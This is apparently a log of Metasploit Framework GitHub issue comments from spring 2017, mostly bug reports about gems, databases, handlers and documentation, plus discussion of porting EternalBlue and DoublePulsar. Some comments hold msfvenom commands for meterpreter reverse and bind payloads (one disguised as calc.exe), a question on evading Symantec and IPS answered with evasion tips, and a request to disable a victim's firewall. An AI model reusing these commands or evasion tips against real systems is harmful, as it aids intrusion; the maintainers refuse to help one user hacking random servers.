[2017-04-21 08:47] v-p-b commented on #8272
Yes I did. `bundle install` fixes it *after* I delete/move Gemfile.local.

[2017-04-21 08:49] v-p-b commented on #8272
I also checked my bundler directory under ~/.rbenv/ and found that the appropriate version of bit-struct is checked out there.

[2017-04-21 08:57] busterb commented on #8272
I have updated and corrected the instructions.

[2017-04-21 09:01] v-p-b commented on #8272
Thank you, that solves my immediate problem!
But wouldn't this interfere with future updates? I suppose Gemfile.local.example is commited as it is so that users won't have to resolve conflicts in their local copies all the time.

[2017-04-21 09:17] busterb commented on #8272
You're already implicitly modifying Gemfile.lock as well. If you're doing git pull, it should rarely have merge issues.

[2017-04-21 09:23] busterb commented on #8272
We could possibly just add something like this permanently to Gemfile, so it just does the right thing if the Oracle bits are installed

[code]

[2017-04-21 09:32] v-p-b commented on #8272
Well, I personally got so frustrated by merge conflicts and outdated locks that I now have special notes in my MSF directory to remind me how to handle these reoccuring problems... I don't get why a .lock file should be version controlled, but I'm not a Ruby dev either.

As you seem to be OK with merge conflicts on update, shouldn't be the .example file removed from the repo?

I don't know what ex

[2017-04-21 09:40] busterb commented on #8272
Checking in Gemfile.lock dates from an earlier time - guess we'd have to ask Luke from 4 years ago what this is supposed to mean:

555a9f2559 - Refactor Msf::ModuleManager (4 years, 7 months ago) <Luke Imhoff>

As I can best tell, Gemfile.lock is just a note from our build system, or whoever last bumped a gem, that 'yep, these versions of these gems play nicely together', so that anyone who checks

[2017-04-21 10:22] v-p-b commented on #8272
Yes that matches my experience. I don't want to go into repo management details because I'm no expert and this should be your decision. This would also deserve a different Issue/PR.

I just wanted to point out that although modifying the master Gemfile can work around this particular problem, it won't help people relying on their local Gemfile (for whatever reasons) which looks like a supported us

[2017-04-21 10:39] busterb commented on #8272
I think I'll defer to @egypt who added the local gemfile originally. Not certain it's the best path moving forward, since I certainly don't want to maintain special cases if they can be avoided.

On the other hand, once we get rid of bit-struct entirely (unfortunately it stopped being maintained upstream, so we now have a local fork - which is where your problem came from downloading), this issue

[2017-04-21 10:49] v-p-b commented on #8272
I think the one with bit-struct was just the first error that occured. Gemfile defines a couple of other gems in the same fashion:

[code]

If I comment out bit-struct and run `bundle install` the same error occurs but now with method_source upon stratup.

[2017-04-21 10:51] busterb commented on #8272
pretty odd - I've even tried reproing locally but no such luck. I'm using rvm but no idea if that matters.

[2017-04-21 11:00] v-p-b commented on #8272
I created a fresh clone from master, then:

[code]

Those fatals may indicate the problem we have here. After this:

[code]

[2017-04-21 11:03] busterb commented on #8272
is there a reason you use 'msfupdate' here? why not just 'git pull' if you're using source checkout?

[2017-04-21 11:06] v-p-b commented on #8272
This has been the least painful way, especially because of dependency management. IIRC after `git pull` I'd also have to do at least a `bundle install`l to get things right, right?

[2017-04-21 11:44] FireFart opened #8273 "RHOSTS Validation"
Just stumbled across this when scanning a large ip set with `auxiliary/scanner/smb/smb_ms17_010`.

If you set the `RHOSTS` to `10.0.0.0/8` and execute an `run` metasploit tries to resolve every IP address via DNS before starting the real scan.

Is there a trick to skip the DNS lookups?

[2017-04-21 12:42] busterb commented on #8273
I suspect that's happening inside of rex-socket when it sets up Rex::Socket::RangeWalker, but I'm not seeing it here. What's your environment?

[2017-04-21 12:45] FireFart commented on #8273
@busterb I'm on a freshly installed kali switchted to multiuser.target, `/etc/resolv.conf` link to NetworkManager was deleted and added a new file with 2 nameservers in the scanned range and a fixed ip address in `/etc/network/interfaces`:
[code]

[2017-04-21 13:59] FireFart commented on #8273
@busterb can't reproduce any more :/ I think this was caused by some background noise on the virtual machine.

Will close this issue and if it occurs again, I will open it again

[2017-04-21 13:59] #8273 closed

[2017-04-21 21:51] chansook opened #8276 "can't make database in metasploit"
hello,

I just recently installed metasploit framework on my mac os x sierra and i neglected to create a database when prompted to do so  / now i'm trying to create a database and i'm not really sure how to do that / any and all help would be greatly appreciated. thanks, chansook

[2017-04-21 22:17] busterb commented on #8276
type 'msfdb init'

[2017-04-21 22:17] #8276 closed

[2017-04-21 22:24] egypt commented on #8272
@busterb If you delete Gemfile.lock, yes, you get the latest of everything that isn't locked to a specific version. That also means you get a bunch of code that we haven't run through CI.

[2017-04-21 22:33] busterb commented on #8272
Understood @egypt , though we do simply run rspec and bump every week. Frequency of failure is about once every 6 months (usually due to bundler or rake breaking something)

[2017-04-21 22:42] jmartin-r7 commented on #8272
A reasonable write up containing what reads to me as good advice on when and when not to commit Gemfile.lock.

http://yehudakatz.com/2010/12/16/clarifying-the-roles-of-the-gemspec-and-gemfile/

In our case we have a combination of an Application and a Gem however the reasons to commit the file for an Application described hold true here for why Metasploit should maintain Gemfile.lock.

[2017-04-21 22:42] egypt commented on #8272
@v-p-b Note the comment in `Gemfile.local.example` --
[code]

@busterb I agree with you that Gemfile.local is not a great solution, but the problem it solves kinda sucks too. It's the only way to add gems to the framework without requiring that they be in upstream master because of the way Bundler works. Bundler modifies the load path so that only gems in Gemfile.lock can be `require`d.

[2017-04-21 22:45] egypt commented on #8272
@busterb When you say "bump every week" do you mean we run `bundle update`?

[2017-04-21 22:48] busterb commented on #8272
Yep, we've been doing it for over a year.

[2017-04-22 08:12] bcoles opened #8278 "auxiliary/scanner/lotus/lotus_domino_hashes.rb failure"
FWIW; found this diff in one of my git repos...

I encountered an error with the [modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb) module a while ago.

The error caused the module to fail upon attempting to retrieve details for the first user from `names.nsf` resulting in a bac

[2017-04-22 11:30] chansook commented on #8276
thanks!! much appreciated!!

[2017-04-22 11:36] chansook commented on #8276
another question, though!! after i enter 'msfdb init' i get this message: Found a database at /Users/poo/.msf4/db, checking to see if it is started Database already started at /Users/poo/.msf4/db --then when i check to hit 'db_status' i get this: postgresql selected, no connection !!!  what gives here??

[2017-04-22 11:40] chansook commented on #8276
another question, though!! after i enter 'msfdb init' i get this message:
Found a database at /Users/poo/.msf4/db, checking to see if it is started
Database already started at /Users/poo/.msf4/db --then when i check to hit
'db_status' i get this: postgresql selected, no connection !!! what gives
here??

On Fri, Apr 21, 2017 at 3:17 PM, Brent Cook <notifications@github.com>
wrote:

[2017-04-22 13:02] busterb commented on #8276
Do you have Cylance installed? It kills postgresql
Other than that, I can recommend 'msfdb reinit' to reinitialize the database if it is corrupt.
You might also check the logs under .msf4/db/

[2017-04-22 13:52] chansook commented on #8276
maybe i should reinstall metasploit/ what is the command to uninstall the
program??
thanks

On Sat, Apr 22, 2017 at 6:03 AM, Brent Cook <notifications@github.com>
wrote:

[2017-04-22 13:55] chansook commented on #8276
i keep getting this message after i start metasploit: [-] Failed to connect
to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5433?
could not connect to server: Connection refused
    Is the server running on host "localhost" (fe80::1) and accepting
    TCP/IP connections on port 5433?
c

[2017-04-22 14:33] busterb commented on #8276
cat .msf4/db/log

[2017-04-22 18:15] busterb commented on #8276
If I can't see your logs, I'm flying blind. Reinstalling would be unlikely to help. Maybe drop by #metasploit on IRC time and I can walk you through debugging.

[2017-04-22 19:46] busterb commented on #8272
I think I figured out how to make Gemfile.local work for you. Try this:

bundle install --gemfile Gemfile.local

[2017-04-23 11:01] v-p-b commented on #8272
@egypt Thanks, I totally missed that note. Does this mean that not running `bundle install --gemfile Gemfile.local` after an update thus getting errors regarding gems of the master Gemfile is expected behavior? In this case you can close this issue (taking care of this in msfupdate sounds like a good idea to me though), I can see the changes of the Oracle wiki page is already reverted.

Thanks aga

[2017-04-23 12:35] chansook commented on #8276
what would be a good time?? i'm on Hawaii Pacific time

On Sat, Apr 22, 2017 at 11:15 AM, Brent Cook <notifications@github.com>
wrote:

[2017-04-23 13:22] busterb commented on #8272
I only found a random posting on stackoverflow that suggested it, and it worked for me. Not sure if expected, but that's the reality of it :)

Yeah, if we updated msfupdate to be aware of Gemfile.local, that would solve your issue.

[2017-04-23 15:00] h00die opened #8281 "Docs for FTP scanners"
From talk on IRC today, @itsmeroy2012 requested a ticket for some more docs.

I would recommend docs for:

1. `ftp_login` (`auxiliary/scanner/ftp/ftp_login`)
2. `anonymous` (`auxiliary/scanner/ftp/anonymous`)
3. `ftp_version` (`auxiliary/scanner/ftp/ftp_version`)

In the `Vulnerable Application` part of the docs, I would include instructions on how to install ftp server on kali (http://www.gosecur

[2017-04-23 23:06] zerosum0x0 commented on #8269
Anyone planning to work on this see my comments in PR #8271

[2017-04-24 00:09] olamotte opened #8287 "SET LHOST ignored - uses eth0 instead of specified IP - kali 4.14.13-dev"
## Steps to reproduce

I am using an OpenVPN TAP iface. The IP i'm trying to set for LHOST in the multi/handler is ignored and seems to default to the one of eth0.

Version v4.14.4-dev is affected, and since I realized i'm a bit behind, I just updated to v4.14.13-0kali1 / 4.14-13-dev which also has the same behavior.

- I am using a custom alias (quickie) to start a multi handler from bash.
NB: Th

[2017-04-24 09:28] timwr commented on #8269
@zerosum0x0 you rock!
I've attempted to answer some questions as best I can. Hoping some of the others can chime in too (and likely correct me).

How about `lib/msf/core/exploit/smb/ms17_010.rb`? Should be ok to include this in the aux module as well.

Interesting, if ExternalBlue executes shellcode in ring0 then why can't you just use take the payload shellcode, e.g `payload.encoded` and skip the

[2017-04-24 12:51] zerosum0x0 commented on #8269
Thanks @timwr

I did some glancing at existing code. It seems the only other similar exploit (remote windows kernel) is MS09-050. It is x86 only and also seems to overwrite the syscall registers to enter usermode, something we probably don't want to do. I will add some shellcode to make Msf::Exploit::KernelMode compatible for x64, and inject DLL payloads.

[2017-04-24 15:16] busterb commented on #8276
I can be around this afternoon CST if you want to drop in.

[2017-04-24 20:09] egypt commented on #7403
@bcook-r7 Would this be more accurately titled something like "SOCKS protocol handler buffers incorrectly" ?

[2017-04-24 20:13] egypt commented on #6936
Working as expected. The HTTPS handler has to continue listening to be able to talk to the session. When the session exits, the listener will shut down.

[2017-04-24 20:13] #6936 closed

[2017-04-24 21:33] busterb commented on #7403
Sure, though keep in mind that I may have also been incorrect in my assessment. Trust but verify!

[2017-04-25 00:58] nixawk commented on #8220
The pr is merged. Thanks everyone.

[2017-04-25 00:58] #8220 closed

[2017-04-25 03:09] busterb opened #8289 "powershell_execute and python_execute timeout too quickly"
These commands use the default 15 second command timeout, but when using advanced scripts, it is highly possible that they will take longer to complete. This is the case, for instance, with BloodHound.ps1. It would be nice if as long as meterpreter was responsive that the command would not timeout until it actually completed.

In another case, it is often useful to run a script in the background.

[2017-04-25 14:36] egypt commented on #8287
I'm unable to reproduce this locally on master.

Note that the handler should *not* fail if no interface has the address specified in LHOST (your second case). This is necessary when you are forwarding ports from an upstream router, for example. However, in that case, it should print something like this:
[code]

@olamotte Can you add a `set LHOST` (with no argument) before `run` and make sure LHOS

[2017-04-25 17:43] liamtoh06 opened #8292 "Post failed: RuntimeError Could not determine UID: """
## Steps to reproduce
When running this and exploiting the background session using
 post/linux/gather/hashdump, getting the below error

How'd you do it?

Post failed: RuntimeError Could not determine UID: ""
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/post/linux/priv.rb:24:in `is_root?'
[-]   /usr/share/metasploit-framework/modules/post/linux/gather/hashdump.rb:27:in `run'

[2017-04-25 18:44] olamotte commented on #8287
Hi @egypt
Just to be clear, the handler does bind to 0.0.0.0 if the iface is not present.
I was using this case as a proof that the first attempt to set LHOST is simply ignored and not actually tried.

Here's another flow:
`root@robert-iphone:~/Desktop# msfconsole
[INSERT COOL BANNER]
       =[ metasploit v4.14.13-dev                         ]
+ -- --=[ 1643 exploits - 946 auxiliary - 289 post

[2017-04-25 18:47] olamotte commented on #8287
Hi @egypt
Just to be clear, the handler does bind to 0.0.0.0 if the iface is not present.
I was using this case as a proof that the first attempt to set LHOST is simply ignored and not actually tried.

Here's another flow:
[code]

[2017-04-26 01:24] h00die opened #8296 "Auxiliary Scanner Docs"
In an attempt to prioritize docs, I (arbitrarily) decided auxiliary/scanner would be the best place to start.  Lots of "underlying" and basic protocols live here.  These can also help for later exploit modules since once you install a certain protocol for the scanner, you may be able to use it for the exploit as well and simply copy/paste the contents of the ```# Vulnerable Application``` section.

[2017-04-26 02:07] OJ commented on #8289
Absolutely +1 to this. It's been on my TODO list to fix properly for ages. It'll be great to come up with a strategy to solve this across the board, as there are other commands that might take a long time, or that could be backgrounded.

[2017-04-26 02:10] timwr commented on #8287
Yes, you need to set the payload first otherwise you don't know the options, for instance the exec payloads take a CMD option not an LHOST. You can use `setg LHOST blah` if you want to set it (globally) before the payload.

[2017-04-26 02:35] h00die commented on #8296
I'll work on knocking out the VNC ones later in the week.

[2017-04-26 02:37] h00die commented on #8296
@itsmeroy2012 just wanted to make sure you saw this big ticket. feel free to pick any. telnet_login and telnet_version may be pretty easy since they are like the ftp ones.

[2017-04-26 06:25] wvu-r7 commented on #8269
Oops, missed @timwr's response here. I think we're in agreement. :)

[2017-04-26 08:58] #8287 closed

[2017-04-26 09:04] Markakd opened #8302 "osx 10.11 fail to start the lastest version metasploit"
I updated my metasploit recently, then I got some error as follow:

[code]

I searched a lot and thought there may be something wrong with my xcode version, I tried
`xcode-select --install` and even reinstall my xcode commandline tools ,it still can not solve the problem.
and then I tried update ruby version with rvm to version 2.3.0 and then 2.4.1 ,they also didn't work.

So, is anyone meet the s

[2017-04-26 16:12] jork2345 commented on #8269
so who's gonna build this ?

[2017-04-26 17:37] pbarry-r7 commented on #7471
Oof, this item didn't get timely attention, my apologies.  PR is up to fix the behavior, it works with the existing Metasploit paradigm of considering web vulnerabilities as a special type of vulnerability, so you'll be able to see web vulns imported from Acunetix XML files via the MSF wmap plugin (specifically: **wmap_vulns -l**).

[2017-04-26 17:59] itsmeroy2012 commented on #8296
I'll be busy for some weeks. Will look into it for sure. Thanks for the tag @h00die .

[2017-04-26 20:26] brandonprry opened #8304 "CredentialCollection requires password source, but Credentials do not require a password"
I have a module I have written that bruteforces usernames only, given an information disclosure issue in a login form. To efficiently brute force potential usernames, I build a LoginScanner for the web application.

It turns out that a CredentialCollection requires some password source, even if it is ```blank_passwords: true```.

For instance, the following line of code will cause the module to no

[2017-04-26 20:32] h00die commented on #8296
No rush!

[2017-04-26 21:04] busterb opened #8305 "SMTP delivery does not escape \r\n.\r\b sequences in messages"
The basic problem is that if your message happens to have a sequence like above, it does not get escaped, and the message send can happen prematurely. This messes up the state machine for SMTP servers like smtp.com and sendgrid (but not postfix), so this is a good thing to fix.

[2017-04-26 21:48] wvu-r7 commented on #8269
@zerosum0x0 is tentatively building this.

[2017-04-26 22:40] #7471 closed

[2017-04-27 02:56] busterb commented on #7297
this should be resolved now as of #8279

[2017-04-27 02:56] #7297 closed

[2017-04-27 02:58] busterb commented on #6514
This should be resolved now as of #8279

[2017-04-27 02:58] #6514 closed

[2017-04-27 03:01] busterb commented on #7464
I tried this yesterday, should work in latest.

[2017-04-27 03:01] #7464 closed

[2017-04-27 03:04] busterb commented on #8017
There's nothing really specific for us to do here. It'll always be an ongoing effort. So, I'm going to close this as an issue; we'll keep moving this direction.

[2017-04-27 03:04] #8017 closed

[2017-04-27 03:05] wvu-r7 commented on #7297
Damn right it is!

[2017-04-27 05:27] zerosum0x0 commented on #8269
@wvu-r7 @jork2345

Specifically I'm working on updating Msf::Exploit::KernelMode for x64 payloads and injecting DLLs in a similar way to what EQGRP did. Currently it does neither of these things. I also was bored on a flight and re-read some of skape's old papers. The DP module should be pretty simple with these payloads in place. I give the eta maybe late this weekend? It will be very convenient

[2017-04-27 09:34] ClaudyFaucan opened #8311 "Meterpreter incorrect parameter when executing from memory but not from disk"
Hello,
I'm encountering a problem in meterpreter when i try to execute a file from memory, i'm trying this command :
`execute -f '7za.exe' -c -i -H -a 'a archive * -p' -m `
and get 'Operation failed : The parameter is incorrect'

Howerver when I take off the -m and upload the executable the command works like a charm. I think that the file is executed considering the error message but I can't figu

[2017-04-27 10:20] zoo143 opened #8312 "OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol"
## Steps to reproduce
How'd you do it?

1. payload windows/meterpreter/reverse_tcp
2. exploit

## Expected behavior

it's to obtain meterpreter session.
Meterpreter prompt should show up as below.

## Current behavior

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

### I installed Metasploit with:
- [x] Kali packa

[2017-04-27 11:03] timwr commented on #8312
How are you generating the payload? msfvenom? Can you post the logs?

[2017-04-27 12:49] arisada commented on #7403
@egypt is there an easy way to test if modules other than SOCKS are impacted ? I have many metasploit modules that don't work properly over routed connections, but I am not sure it's the same issue.

[2017-04-27 13:18] DaniLabs opened #8313 "StringBleed-CVE-2017-5135"
Stringbleed The CVE 2017-5135 SNMP authentication bypass, created and reserved for this issue, vulnerability type: Incorrect Access Control.

https://github.com/string-bleed/StringBleed-CVE-2017-5135

[2017-04-27 15:06] jhart-r7 commented on #8313
Be careful https://github.com/string-bleed/StringBleed-CVE-2017-5135/blob/master/poc-linux.c#L83

[2017-04-27 15:09] DaniLabs commented on #8313
T.T Sorry, I just read the "exploit" and it is a troll
Close the issue.

[2017-04-27 15:09] #8313 closed

[2017-04-27 22:54] #8305 closed

[2017-04-27 23:02] jennamagius commented on #8269
EternalBlue is fairly straightforward to reproduce, the only trick is that it involves opening 21 different connections. I've been able to install DoublePulsar without using the NSA tools by directly replaying the captured attack.

Files to reproduce this are:
https://gist.github.com/jennamagius/301cead69d87719819d56fbde0d81238
https://gist.github.com/jennamagius/ca036fca317b3aeb33f55495e2a45ea7

[2017-04-27 23:28] sn0wfa11 opened #8314 "Module Docs Not Working - MSF Install from Kali Repo"
## Overview

MSF installed standard on Kali does not show the Knowledge Base module docs when using `info -d`. The module docs do show up for the Dev Environment setup from Github.

Not sure if this is an MSF packaging issue or if it is a Kali repo issue, but wanted to start here.

Just ran Parrot OS 3.5 on live ISO and it has the same issue as described below. (MSF v.4.14.0-dev)

## Steps to repr

[2017-04-28 00:03] zoo143 commented on #8312
Thanks.
I used msfvenom, and below is the  console log.
-------------------------------------------------
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Pa

[2017-04-28 01:55] busterb commented on #8314
Works as expected with the latest Rapid7 omnibus packages too. I wonder why Kali doesn't package metasploit with the same layout we have in the source tree.

[2017-04-28 01:56] busterb commented on #8314
This sounds like something that should be filed on the Kali bug tracker instead. They're receptive to fixes.

[2017-04-28 03:53] busterb commented on #8312
how did you invoke your payload with format 'python' on the target?

[2017-04-28 03:55] busterb commented on #8312
I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?

[2017-04-28 05:11] sn0wfa11 commented on #8314
Ok, I'll contact OffSec and go from there.

[2017-04-28 09:31] zoo143 commented on #8312
yes, I follow this blog
http://inaz2.hatenablog.com/entry/2015/07/13/011841

thanks

[2017-04-28 13:30] walunte commented on #8302
same problem and don't know how to fix it T_T

[2017-04-28 14:14] busterb commented on #8302
Hmm, ok. We recently updated the builder to 10.12, it sounds like we need to retarget it to build compatible binaries for older OS X versions.

[2017-04-28 15:38] busterb commented on #8302
I think SDKROOT=macos10.11 used to configure this setting, but after reading https://forums.developer.apple.com/thread/43381 it sounds like Apple has made this more annoying

[2017-04-28 15:54] pbarry-r7 commented on #8292
Hi @liamtoh06.  What was the target OS+version you were running this against?  FWIW, I tested against an Ubuntu 14.04 instance and it worked as expected.  If you have direct access to your target, I'd be curious  what the `id` command (run as root) outputs, as the output from that command is what's causing the failure you're seeing.  Also might be good if you could run `version` in msfconsole in c

[2017-04-28 16:11] zerosum0x0 commented on #8269
The EQGRP DoublePulsar shellcode, much like ExtraBacon, has many areas for improvement. Much of it seems like a copy/paste of compiler output.

Creating a thread (or a process) from kernel mode is a complex process, so I'm going to skip such a payload for now. The problem is that most of the structures are opaque and offsets change between Windows versions.

@wvu-r7 @timwr

When we queue an APC, w

[2017-04-28 17:36] Lopesy1191 commented on #8064
Hey, noob here, how can I run this exploit over https? I am getting an error, when testing against 2.3.32 (see below) it is requiring a certificate. My question is, how (if I can) can I pass in the certificate in-line, or is there a way to perform this using some type of insecure option?

`urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:661)>`

[2017-04-28 17:43] egypt commented on #8064
@Lopesy1191 The Metasploit module should work fine with TLS. Use that instead of the PoC posted here.

[2017-04-28 18:05] busterb commented on #8312
I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.

Good luck.

[2017-04-28 18:05] #8312 closed

[2017-04-29 05:22] gecko148 opened #8317 "Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS."
hi i was trying to hack some computers using Armitage but when i scan the computer it give me the following error "Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS".

my OS is kali linux
i am running the latest version of Metasploit on kali linux

also when i try to update the system all it says is "Reading package lists... Done" and does nothing else i h

[2017-04-29 05:30] wvu-r7 commented on #8317
We are helping you on IRC literally right now.

[2017-04-29 05:30] #8317 closed

[2017-04-29 05:31] wvu-r7 commented on #8317
And you left...

[2017-04-29 05:41] gecko148 opened #8318 "Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS."
hi i am trying to hack computers with Armitage but when i scan the computer it gives me the following error "Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS"
i have tried setting it to RHOST but then when i try to set it to RHOST is says "RHOST is not a valid option for this module. Did you mean RHOSTS?"

i have tried updating the system but when i try t

[2017-04-29 06:35] kimocoder commented on #8317
forwarded from.. https://bugs.kali.org/view.php?id=3985

[2017-04-29 07:06] codekraft-studio commented on #8318
you get already answered I think #8317

[2017-04-29 12:53] timwr commented on #8269
There is PrependFork but I don't think it works for Windows payloads :/

[2017-04-29 17:10] d78ui98 commented on #8269
what could be the possible reason ?

Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              192.168.45.141
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?

[2017-04-29 17:55] #8318 closed

[2017-04-29 18:34] wvu-r7 commented on #8269
Firewall? Host not up?

[2017-04-29 19:43] d78ui98 commented on #8269
thanks it worked!! @wvu-r7    Is there any way i can turn off the victims firewall.. and i want to know everything there is to know about these exploits.. I have to give a presentation on this. Can you help?

[2017-04-30 07:50] gecko148 opened #8321 "Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS."
hi i am trying to hack computers with Armitage but when i scan the computer it gives me the following error "Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS"
i have tried setting it to RHOST but then when i try to set it to RHOST is says "RHOST is not a valid option for this module. Did you mean RHOSTS?"

i have tried updating the system but when i try t

[2017-04-30 08:05] wvu-r7 commented on #8321
First of all, we tried to help you on IRC, but you left, and then you opened three tickets (#8317, #8318, and #8321). Second, this is a bug tracker, and what you've presented are not bugs. Support is done on IRC or at https://community.rapid7.com/.

However, since you've been so diligent, I'll humor you. You have provided zero details about your setup, so how do you expect me to help you? What mod

[2017-05-01 14:07] itsmeroy2012 commented on #8321
Which exploit are you using? @gecko148

[2017-05-01 20:51] wvu-r7 commented on #8321
I'll consider reopening this if and when you come back. Still not a bug.

[2017-05-01 21:59] gecko148 commented on #8321
ok so i am getting ip addresses from websites and attacking the webserver's computers but when i scan the computer by "right clicking the computer and then clicking scan" it gives me the error message

[2017-05-01 22:09] wvu-r7 commented on #8321
Wait, what?

[2017-05-01 22:09] #8321 closed

[2017-05-01 22:13] wvu-r7 commented on #8321
We most definitely will not be helping you hack random computers.

[2017-05-02 03:46] WHK102 commented on #8064
Replace by:
[code]

[2017-05-02 07:40] nixawk commented on #8064
Thanks @WHK102

[2017-05-02 09:56] KigothoWilson opened #8328 "Metasploit error"
I'm having the error below when I start my Metasploit. I guess the problem started when I was installing Beef framework:

/opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/activesupport-3.2.17/lib/active_support/dependencies.rb:251:in `require': libruby-1.9.1.so.1.9: cannot open shared object file: No such file or directory - /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/bundler/gems/pcap

[2017-05-02 11:31] busterb commented on #8328
That would appear to be a 3+ year old version of Metasploit commercial edition in /opt/metasploit.

I'd just uninstall /opt/metasploit or at least move it out of the way. This isn't a support forum though, this is for bugs in metasploit-framework. Try #metasploit on IRC please.

[2017-05-02 11:31] #8328 closed

[2017-05-02 11:34] busterb commented on #8328
If you want an up-to-date copy of metasploit framework, please choose https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers for something up-to-date and compatible with current software.

[2017-05-03 03:26] busterb commented on #8314
Thanks @sn0wfa11 - I'll close this one for now.

[2017-05-03 03:26] #8314 closed

[2017-05-03 06:05] vipzen opened #8333 "Meterpreter 'shell' command fails on Win2k SP0"
However, 'execute -f cmd.exe -i -H' works fine.
Only tested against Windows 2000 SP0. In other Windows versions, 'shell' works as expected.

## Steps to reproduce
1. Open a meterpreter session against the target
2. Run the 'shell' command.

[code]

## Expected behavior
What should happen?
Brings me a nice shell

## Current behavior
What happens instead?

## System stuff

### Metasploit version
Fra

[2017-05-04 00:03] ghost opened #8339 "Strange charater when pressing key enter"
## Steps to reproduce

How'd you do it?

1. ... Start msfconsole
2. ... press enter...
3. ... it get a \r character after key pressed

Im using arch and installed metasploit from the official repo https://wiki.archlinux.org/index.php/Metasploit_Framework (
ruby2.3-2.3.4-2, ruby2.3-bundler-1.14.6-1,  metasploit-4.13.22-1)

How can i hide the \r character? It doesnt affect the metasploit behavior...

[2017-05-04 00:21] wwebb-r7 commented on #8339
Is this in a terminal emulator or the console?  If yes to a terminal emulator, which one?

FWIW I just tried and cannot reproduce it on Arch using rxvt-unicode, Xterm, and terminator with the latest dev branch (which would be metasploit-git on AUR)

[2017-05-04 00:39] jchengching commented on #8339
Hi

its the gnome terminal, i didnt tried in a terminal emulator

[2017-05-04 00:52] jchengching commented on #8339
I will try with installing it from AUR...

[2017-05-04 02:27] sn0wfa11 commented on #8314
The issue was fixed by Kali as of version 4.14.15 on 5-3-17.

[2017-05-04 02:28] busterb commented on #8314
Nice, thanks for the update.

[2017-05-04 14:10] #8264 closed

[2017-05-05 03:56] zerosum0x0 commented on #8269
Just wanted to give a quick update. Writing, and debugging, ring0 code is understandably a slow process. Once this process is complete, @jennamagius and I will work on DoublePulsar and EternalBlue exploit modules.

I am 80-90% complete on the shellcode journey. It's important to completely reverse these payloads to understand what they do, and given what we saw with ExtraBacon and other analysis o

[2017-05-05 06:49] xiaovpn commented on #8220
it should be ie 11 or10?
When i use ie 8 on win7sp1,it's not working ,bu changed to ie11,everything is ok

[2017-05-05 08:59] snemes commented on #8220
It should be at least IE10, so IE11 should be fine too.

[2017-05-05 09:47] Spakman commented on #8339
I'm experiencing the same thing using other rb-readline programs on Arch. The small examples in the rb-readline repositories only experience this behaviour when calling `require "readline.rb"` rather than `require "readline"` but unfortunately my application doesn't do that.

Any idea what package was updated on Arch that may have caused this?

[2017-05-05 10:16] jchengching commented on #8339
Hi

mmm, no ill try to remember, but actually dont have any idea.

Ty

[2017-05-05 19:15] FireFart opened #8349 "Publish the Docker Image"
This issue should track the steps needed to publish the Docker image to docker hub.

I think after https://github.com/rapid7/metasploit-framework/pull/8310 is merged the image is ready to be published. The image can be run via `docker-compose` if you have the git version ready or also with a
[code]
The last command will run without a database but it can be attached manually. Once the image is publ

[2017-05-05 19:58] carnal0wnage commented on #6398
still experiencing this same problem.

login failed for _login.  runs commands with _cmd

version
Framework: 4.14.2-dev-9c91849097
Console  : 4.14.2-dev-9c91849097

[2017-05-05 20:10] Tikam02 opened #8350 "msfvenom payload : Not Generating msfvenom payload."
I run this command

msfvenom -a x86 --platform windows -x /root/calc.exe -k -f exe -o /root/calc1.exe -e x86/shikata_ga_nai -i 1 -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=12345

And this happenned :

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with fi

[2017-05-05 20:20] kaospunk commented on #8350
You requested it to use /root/calc.exe as the template file. Does that file actually exist on your machine?

[2017-05-05 20:21] Tikam02 commented on #4381
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe > /tmp/fake_64_calc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 484 bytes
Error: No such file or directory @ rb_file_s_size - /tmp/templ

[2017-05-05 20:24] Tikam02 commented on #8350
ohk i'll try it differently , thanks  👍

[2017-05-05 20:40] Tikam02 opened #8351 "Antivirus Detection : Payload Detected by Symantec and IPS."
While using Meterpreter variations as payload. Now I can bypass Anti-Virus and Firewalls easily, but Symantec Sonar and IPS always detect Meterpreter payloads and block the attacker IP.

Is there any better payload than Meterpreter that can bypass antiviruses like that are used by symantec and IPS ?

[2017-05-05 20:48] hostbob commented on #8220
I do not get this, what this exploit has to do with ie? Thought its self execute no dependency . if there is something to do with ie I thought should be hta plz correct me if I'm wrong

[2017-05-05 21:08] vysec commented on #8351
Just encrypt the stage? It's only detecting the stage. Or go stageless.

[2017-05-05 22:19] wwebb-r7 commented on #8339
